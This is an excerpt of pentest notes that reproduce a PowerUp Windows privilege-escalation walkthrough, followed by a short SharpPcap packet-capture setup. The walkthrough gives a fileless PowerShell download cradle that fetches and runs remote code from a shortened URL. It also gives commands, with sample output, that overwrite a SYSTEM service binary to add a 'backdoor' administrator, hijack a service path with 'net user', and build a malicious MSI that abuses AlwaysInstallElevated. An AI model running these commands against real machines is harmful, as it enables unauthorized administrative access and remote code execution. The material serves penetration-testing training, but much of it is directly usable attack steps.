1148 | Sidenote: there are a few other ways you can run the Invoke-AllChecks functionality in the field, particularly over a Meterpreter (or Beacon) agent. One option is to upload the PowerUp.ps1 script to the machine, drop into a shell, and execute the following command: | |
1149 | ||
1150 | C:\> powershell.exe -exec bypass -Command “& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}” | |
1151 | If you want to invoke everything without touching disk, use something like this: | |
1152 | ||
1153 | C:\> powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://bit.ly/1mK64oH’); Invoke-AllChecks” | |
1154 | There’s also a Metasploit module for running powershell commands through a session, post/windows/manage/powershell/exec_powershell. Before you use this module, first append “Invoke-AllChecks” to the end of PowerUp.ps1 on your attacker machine, and then specify the local path to the script in the module options. Metasploit will upload the script, run it on the target, retrieve the results and save them back to your local machine. | |
1155 | ||
1156 | Now, let’s take a look at that example report: | |
1157 | ||
1158 | Running Invoke-AllChecks | |
1159 | Checking for unquoted service paths... | |
1160 | [+] Unquoted service path: CustomSVC - C:\Users\adam\Documents\Visual Studio 2008\Projects\Service\Service\bin\Release\service.exe | |
1161 | Checking service executable permissions... | |
1162 | [+] Vulnerable service executable: CustomSVC - C:\Users\adam\Documents\Visual Studio 2008\Projects\Service\Service\bin\Release\service.exe | |
1163 | Checking service permissions... | |
1164 | [+] Vulnerable service: CustomAPP - C:\Custom\deploy.exe | |
1165 | Checking for unattended install files... | |
1166 | [+] Unattended install file: C:\Windows\Panther\Unattended.xml | |
1167 | Checking %PATH% for potentially hijackable service .dll locations... | |
1168 | Checking for AlwaysInstallElevated registry key... | |
1169 | [+] AlwaysInstallElevated is enabled for this machine! | |
1170 | Checking for Autologon credentials in registry... | |
1171 | We definitely have some interesting output to check out here. The first thing I could check out is the unattended installation file at C:\Windows\Panther\Unattended.xml- this file might have a base64-encoded deployment password that would give us a quick win. | |
1172 | ||
1173 | The next up is the vulnerable service executable. This misconfiguration happens when the executable associated with a service has improper permissions, allowing other users to write to the .exe. Since these services run as SYSTEM, if we replace the exe with our own, we can escalate quickly. PowerUp includes a function to easily back up the service .exe and write out a patched C# service to that service location. If it succeeds, it returns True, and returns False if it fails. We can use the -Verbose flag to get some more information: | |
1174 | ||
1175 | PS C:\> Write-ServiceEXE -ServiceName CustomSVC -UserName backdoor -Password password123 -Verbose | |
1176 | VERBOSE: Backing up ‘C:\Users\adam\Documents\Visual Studio 2008\Projects\Service\Service\bin\Release\service.exe’ to ‘C:\Users\adam\Documents\Visual Studio | |
1177 | 2008\Projects\Service\Service\bin\Release\service.exe.bak’ | |
1178 | VERBOSE: Service binary written out to ‘C:\Users\adam\Documents\Visual Studio 2008\Projects\Service\Service\bin\Release\service.exe’ | |
1179 | True | |
1180 | This new service binary will create a new user named backdoor, and add them to the local administrators. If we can’t start/stop the service, rebooting the box should do the trick to get the user added. After the user is added, running Restore-ServiceEXE -ServiceName CustomSVC should place the original binary back in its proper place. | |
1181 | ||
1182 | Sometimes services themselves are vulnerable- if we can modify a service and start/stop it, we can change the path name to the service exe to be something like “net user backdoor2 /add”. If we start/stop the service and then repeat that process to add the user to the local administrators, we’re golden: | |
1183 | ||
1184 | PS C:\> Invoke-ServiceUserAdd -ServiceName CustomAPP -UserName backdoor2 -Password password123 -Verbose | |
1185 | VERBOSE: Service ‘CustomAPP’ original path: ‘C:\Custom\deploy.exe’ | |
1186 | VERBOSE: Service ‘CustomAPP’ original state: ‘Stopped’ | |
1187 | VERBOSE: Adding user ‘backdoor2′ | |
1188 | VERBOSE: Adding user ‘backdoor2′ to group ‘Administrators’ | |
1189 | VERBOSE: Restoring original path to service ‘CustomAPP’ | |
1190 | VERBOSE: Leaving service ‘CustomAPP’ in stopped state | |
1191 | True | |
1192 | Finally, let’s check out that AlwaysInstallElevated key. This is a key sometimes set by enterprises in an attempt to simply the deployment of installer packages without granting users administrative rights. However, setting this key actually is the exact same as giving users those rights, as writing out a custom .msi installer and running it will give the user elevated privileges: | |
1193 | ||
1194 | PS C:\> Write-UserAddMSI | |
1195 | Service binary written out to ‘UserAdd.msi’ | |
1196 | True | |
1197 | When we run this .msi, it gives us a gui to add a local admin: | |
1198 | ||
1199 | UserADD.msi | |
1200 | ||
1201 | ||
1202 | ####################################### | |
1203 | #Cannot be reproduce everything below # | |
1204 | ####################################### | |
1205 | ||
1206 | http://ezine.echo.or.id/issue28/005.txt | |
1207 | http://trwagner1.wordpress.com/2012/01/03/powershell-and-wireshark/ | |
1208 | https://www.fishnetsecurity.com/6labs/blog/cryptolocker-prevention-and-remediation-techniques | |
1209 | ||
1210 | ############# | |
1211 | # SharpPcap # | |
1212 | ############# | |
1213 | ||
1214 | Reference: | |
1215 | http://poshcode.org/5374 | |
1216 | ||
1217 | SharpPcap is a cross-platform packet capture framework for the .NET environment, based on the famous pcap / WinPcap libraries. It provides an API for capturing, injecting, analyzing and building packets using any .NET language such as C# and VB.NET. | |
1218 | ||
1219 | # First, you have to install WinPcap | |
1220 | # http://www.winpcap.org/install/default.htm | |
1221 | ||
1222 | # Then, you have to download SharpPcap | |
1223 | # http://sourceforge.net/projects/sharppcap/ | |
1224 | ||
1225 | # And you need to import the assembly from wherever you put it | |
1226 | Add-Type -Path C:\ps\SharpPcap-4.2.0.bin\SharpPcap-4.2.0\Release\SharpPcap.dll | |
1227 | ||
1228 | http://poshcode.org/get/5374 | |
1229 | ||
1230 | (new-object System.Net.WebClient).DownloadFile("http://poshcode.org/get/5374", "c:\ps\SharpPcap.ps1") |